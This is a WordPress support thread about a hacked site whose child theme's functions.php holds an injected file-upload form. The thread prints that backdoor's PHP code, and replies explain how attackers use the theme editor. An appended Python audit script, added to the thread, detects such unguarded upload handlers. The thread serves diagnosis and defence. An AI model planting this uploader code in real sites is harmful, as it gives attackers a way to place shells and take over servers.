Title: Random upload form
Last modified: November 14, 2016

---

# Random upload form

 *  [tamarackshack](https://wordpress.org/support/users/tamarackshack/)
 * (@tamarackshack)
 * [9 years, 7 months ago](https://wordpress.org/support/topic/random-upload-form/)
 * Last week my website developed a problem and can anyone suggest how to fix it?
   The website is [http://www.tamarackshackantiques.com](http://www.tamarackshackantiques.com)
   and has a spot to upload a file for some reason at the top of the page. It randomly
   appeared and is on both the actual site and the admin part. I also can’t change
   or upload photos to the site or to the products. Any suggestions on how to fix
   this?

Viewing 5 replies - 1 through 5 (of 5 total)

 *  Moderator [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/)
 * (@sterndata)
 * Volunteer Forum Moderator
 * [9 years, 7 months ago](https://wordpress.org/support/topic/random-upload-form/#post-8434498)
 * According to Sucuri, your site is not serving malware. Before we fly the “hacked”
   flag, let's do a few checks:
 * 1. Install Wordfence and perform a scan of the site, including themes, plugins,
   and core files.
 * 2. If that shows up as clean, this may be a plugin or theme issue. Please attempt
   to disable all plugins, and use one of the default (Twenty*) themes. If the problem
   goes away, enable them one by one to identify the source of your troubles.
 *  Thread Starter [tamarackshack](https://wordpress.org/support/users/tamarackshack/)
 * (@tamarackshack)
 * [9 years, 7 months ago](https://wordpress.org/support/topic/random-upload-form/#post-8436076)
 * Thank you for your help. I do believe that the site was hacked and I figured
   out that they added this to my functions.php on my child theme:
 * ```php
   <?php
   if (isset($_POST['Submit'])) {
       $filedir = "";
       $maxfile = '2000000';
       $userfile_name = $_FILES['image']['name'];
       $userfile_tmp = $_FILES['image']['tmp_name'];
       if (isset($_FILES['image']['name'])) {
           $abod = $filedir.$userfile_name;
           @move_uploaded_file($userfile_tmp, $abod);
           echo "<center><b>Done ==> $userfile_name</b></center>";
       }
   } else {
       echo '<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
   }
   ?>
   ```
 *  [g0tr00t](https://wordpress.org/support/users/g0tr00t/)
 * (@g0tr00t)
 * [9 years, 7 months ago](https://wordpress.org/support/topic/random-upload-form/#post-8436181)
 * That’s definitely the result of malicious action and there’s a very high chance
   that it was done through a WordPress admin compromise. Once they have your admin
   login, they want to upload files to increase their access privileges. This is
   done by uploading PHP shell files and can be done through the two most common
   methods AFTER they have the admin login:
 * 1) Utilize the built-in theme editor to modify the source coding of your theme
   (this is what was likely used in your case)
 * 2) Utilize the plugin uploader to upload a fake plugin that actually contains
   their PHP shells or other malware to increase access privileges for themselves
 * It looks like your login was compromised, theme editor used to inject malicious
   coding to the functions.php theme file and to be more specific it was coding 
   for a file uploader so they could use it to gain further access. It looks like
   an amateur job.
 * If you don’t have a recent clean backup that you can restore from, then I would
   recommend contacting a specialist to handle this for you unless you are familiar
   with hosting environments. After cleaning, you will want to start by hardening
   your WP environment. By far the best two things would be the following:
 * – Disable theme editor through wp-config.php
 * – Implement two-factor authentication for wp-admin
 * P.S. If you are hosting multiple domains under a single user then they are also
   probably infected, or will be soon, through cross site contamination.
    -  This reply was modified 9 years, 7 months ago by [g0tr00t](https://wordpress.org/support/users/g0tr00t/).
      Reason: Forgot to mention cross-site contamination
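
An added example, not part of the original thread: a small Python audit that flags PHP files which move an uploaded file without any WordPress capability or nonce check (the shape of the snippet found in functions.php above), and checks whether wp-config.php disables the theme editor via the WordPress constant `DISALLOW_FILE_EDIT`. The function names, the heuristics and the sample files are assumptions constructed for this illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics chosen for this example; they are not a complete malware signature set.
UPLOAD_SINK = re.compile(r"@?\s*move_uploaded_file\s*\(", re.I)
FILES_SOURCE = re.compile(r"\$_FILES\s*\[")
# WordPress checks a legitimate upload handler normally performs first.
GUARDS = re.compile(r"\b(current_user_can|check_admin_referer|wp_verify_nonce)\s*\(")
FILE_EDIT_OFF = re.compile(r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)

# Constructed sample files (the first mirrors the shape of the snippet in the thread).
INJECTED = "<?php if(isset($_POST['Submit'])){ @move_uploaded_file($_FILES['image']['tmp_name'], $_FILES['image']['name']); } ?>"
GUARDED = "<?php if (current_user_can('upload_files') && check_admin_referer('imp')) { move_uploaded_file($_FILES['f']['tmp_name'], $dest); }"


def scan_php_tree(root):
    """Relative paths of PHP files that move an uploaded file with no capability or nonce check."""
    root = Path(root)
    hits = []
    for path in root.rglob("*.php"):
        text = path.read_text(errors="replace")
        if UPLOAD_SINK.search(text) and FILES_SOURCE.search(text) and not GUARDS.search(text):
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def theme_editor_disabled(wp_config_text):
    """True if wp-config.php sets DISALLOW_FILE_EDIT to true on a line that is not commented out."""
    live = [l for l in wp_config_text.splitlines() if not l.lstrip().startswith(("//", "#"))]
    return bool(FILE_EDIT_OFF.search("\n".join(live)))


def demo():
    """Build a throwaway site tree and return (flagged files, theme editor disabled?)."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        theme = site / "wp-content" / "themes" / "child"
        theme.mkdir(parents=True)
        (theme / "functions.php").write_text(INJECTED)
        (theme / "import.php").write_text(GUARDED)
        (theme / "header.php").write_text("<?php wp_head(); ?>")
        (site / "wp-config.php").write_text("<?php\n// define('DISALLOW_FILE_EDIT', true);\n")
        return scan_php_tree(site), theme_editor_disabled((site / "wp-config.php").read_text())


if __name__ == "__main__":
    print(demo())
```

A hit is a lead for manual review, not a verdict: plugins with their own upload handlers can trip the pattern, and an obfuscated uploader will not.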
 *  Moderator [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/)
 * (@sterndata)
 * Volunteer Forum Moderator
 * [9 years, 7 months ago](https://wordpress.org/support/topic/random-upload-form/#post-8436240)
 * Remain calm and carefully follow [this guide](https://codex.wordpress.org/FAQ_My_site_was_hacked).
   When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://codex.wordpress.org/Hardening_WordPress).
 *  [Michael Kwan](https://wordpress.org/support/users/michoscopic/)
 * (@michoscopic)
 * [9 years ago](https://wordpress.org/support/topic/random-upload-form/#post-9179379)
 * Thank you very much, I encountered the exact same thing and you’ve saved me a
   crapload of time looking for solutions. Thank you.


The topic ‘Random upload form’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 5 replies
 * 4 participants
 * Last reply from: [Michael Kwan](https://wordpress.org/support/users/michoscopic/)
 * Last activity: [9 years ago](https://wordpress.org/support/topic/random-upload-form/#post-9179379)
 * Status: not resolved

